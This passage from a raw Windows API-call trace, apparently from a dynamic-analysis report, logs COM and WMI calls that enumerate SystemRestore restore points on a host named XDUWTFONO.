Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.090] WbemDefPath:IUnknown:Release (This=0x6023a60) returned 0x2 [0122.090] WbemDefPath:IUnknown:Release (This=0x6023a60) returned 0x1 [0122.091] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.091] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.091] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023a60, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6023a60) returned 0x0 [0122.091] WbemDefPath:IUnknown:AddRef (This=0x6023a60) returned 0x3 [0122.091] WbemDefPath:IUnknown:Release (This=0x6023a60) returned 0x2 [0122.091] WbemDefPath:IWbemPath:SetText (This=0x6023a60, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=5") returned 0x0 [0122.091] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.091] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.091] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.094] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.094] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.094] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.094] IWbemClassObject:Get (in: This=0x6023800, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389d8cc*=0, plFlavor=0x389d8d0*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), pType=0x389d8cc*=19, plFlavor=0x389d8d0*=0) returned 0x0 [0122.129] IWbemClassObject:Get (in: This=0x6023800, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389d8cc*=19, plFlavor=0x389d8d0*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), pType=0x389d8cc*=19, plFlavor=0x389d8d0*=0) returned 0x0 [0122.175] CoTaskMemAlloc (cb=0x4) returned 0xbb5a88 [0122.175] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbb5a88, puReturned=0x389bfe4 | out: apObjects=0xbb5a88*=0x6023b48, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.198] IUnknown:QueryInterface (in: This=0x6023b48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6023b48) returned 0x0 [0122.199] IUnknown:QueryInterface (in: This=0x6023b48, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.199] IUnknown:QueryInterface (in: This=0x6023b48, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.209] IUnknown:AddRef (This=0x6023b48) returned 0x3 [0122.209] IUnknown:QueryInterface (in: This=0x6023b48, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.210] IUnknown:QueryInterface (in: This=0x6023b48, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.210] IUnknown:QueryInterface (in: This=0x6023b48, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6023b4c) returned 0x0 [0122.211] IMarshal:GetUnmarshalClass (in: This=0x6023b4c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.211] IUnknown:Release (This=0x6023b4c) returned 0x3 [0122.211] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.211] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.212] IUnknown:QueryInterface (in: This=0x6023b48, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.212] IUnknown:Release (This=0x6023b48) returned 0x2 [0122.212] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.212] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.212] IUnknown:QueryInterface (in: This=0x6023b48, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6023b48) returned 0x0 [0122.212] IUnknown:AddRef (This=0x6023b48) returned 0x4 [0122.212] IUnknown:Release (This=0x6023b48) returned 0x3 [0122.212] IUnknown:Release (This=0x6023b48) returned 0x2 [0122.213] CoTaskMemFree (pv=0xbb5a88) [0122.213] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.213] IUnknown:AddRef (This=0x6023b48) returned 0x3 [0122.221] IWbemClassObject:Get (in: This=0x6023b48, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.221] IWbemClassObject:Get (in: This=0x6023b48, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=6", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.222] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=6") returned 0x6e [0122.222] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=6") returned 0x6e [0122.222] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.223] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.223] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.223] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.225] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6023188) returned 0x0 [0122.228] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023188, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.228] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6023188, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6023da8) returned 0x0 [0122.228] WbemDefPath:IUnknown:Release (This=0x6023188) returned 0x0 [0122.228] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023da8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6023da8) returned 0x0 [0122.229] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023da8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.230] WbemDefPath:IUnknown:AddRef (This=0x6023da8) returned 0x3 [0122.230] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023da8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.230] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023da8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.230] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023da8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbb5a88) returned 0x0 [0122.230] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5a88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.230] WbemDefPath:IUnknown:Release (This=0xbb5a88) returned 0x3 [0122.232] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.232] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.232] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023da8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.232] WbemDefPath:IUnknown:Release (This=0x6023da8) returned 0x2 [0122.232] WbemDefPath:IUnknown:Release (This=0x6023da8) returned 0x1 [0122.232] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.232] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.232] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023da8, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6023da8) returned 0x0 [0122.233] WbemDefPath:IUnknown:AddRef (This=0x6023da8) returned 0x3 [0122.233] WbemDefPath:IUnknown:Release (This=0x6023da8) returned 0x2 [0122.233] WbemDefPath:IWbemPath:SetText (This=0x6023da8, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=6") returned 0x0 [0122.233] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.234] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.234] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.234] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.234] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.234] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.234] IWbemClassObject:Get (in: This=0x6023b48, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389e114*=0, plFlavor=0x389e118*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), pType=0x389e114*=19, plFlavor=0x389e118*=0) returned 0x0 [0122.234] IWbemClassObject:Get (in: This=0x6023b48, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389e114*=19, plFlavor=0x389e118*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), pType=0x389e114*=19, plFlavor=0x389e118*=0) returned 0x0 [0122.235] CoTaskMemAlloc (cb=0x4) returned 0xbb5ac8 [0122.235] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbb5ac8, puReturned=0x389bfe4 | out: apObjects=0xbb5ac8*=0x6023e90, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.244] IUnknown:QueryInterface (in: This=0x6023e90, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6023e90) returned 0x0 [0122.244] IUnknown:QueryInterface (in: This=0x6023e90, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.244] IUnknown:QueryInterface (in: This=0x6023e90, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.245] IUnknown:AddRef (This=0x6023e90) returned 0x3 [0122.245] IUnknown:QueryInterface (in: This=0x6023e90, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.245] IUnknown:QueryInterface (in: This=0x6023e90, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.245] IUnknown:QueryInterface (in: This=0x6023e90, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6023e94) returned 0x0 [0122.245] IMarshal:GetUnmarshalClass (in: This=0x6023e94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.245] IUnknown:Release (This=0x6023e94) returned 0x3 [0122.245] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.248] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.248] IUnknown:QueryInterface (in: This=0x6023e90, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.249] IUnknown:Release (This=0x6023e90) returned 0x2 [0122.249] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.249] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.249] IUnknown:QueryInterface (in: This=0x6023e90, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6023e90) returned 0x0 [0122.249] IUnknown:AddRef (This=0x6023e90) returned 0x4 [0122.249] IUnknown:Release (This=0x6023e90) returned 0x3 [0122.249] IUnknown:Release (This=0x6023e90) returned 0x2 [0122.251] CoTaskMemFree (pv=0xbb5ac8) [0122.251] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.251] IUnknown:AddRef (This=0x6023e90) returned 0x3 [0122.255] IWbemClassObject:Get (in: This=0x6023e90, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.255] IWbemClassObject:Get (in: This=0x6023e90, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=7", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.255] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=7") returned 0x6e [0122.255] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=7") returned 0x6e [0122.256] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.257] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.257] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.257] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.268] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6023198) returned 0x0 [0122.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023198, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.269] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6023198, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x60244f8) returned 0x0 [0122.269] WbemDefPath:IUnknown:Release (This=0x6023198) returned 0x0 [0122.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x60244f8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x60244f8) returned 0x0 [0122.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x60244f8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.269] WbemDefPath:IUnknown:AddRef (This=0x60244f8) returned 0x3 [0122.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x60244f8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x60244f8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x60244f8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbb5ac8) returned 0x0 [0122.272] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5ac8, riid=0x74a1e814*(Data1=0x0, 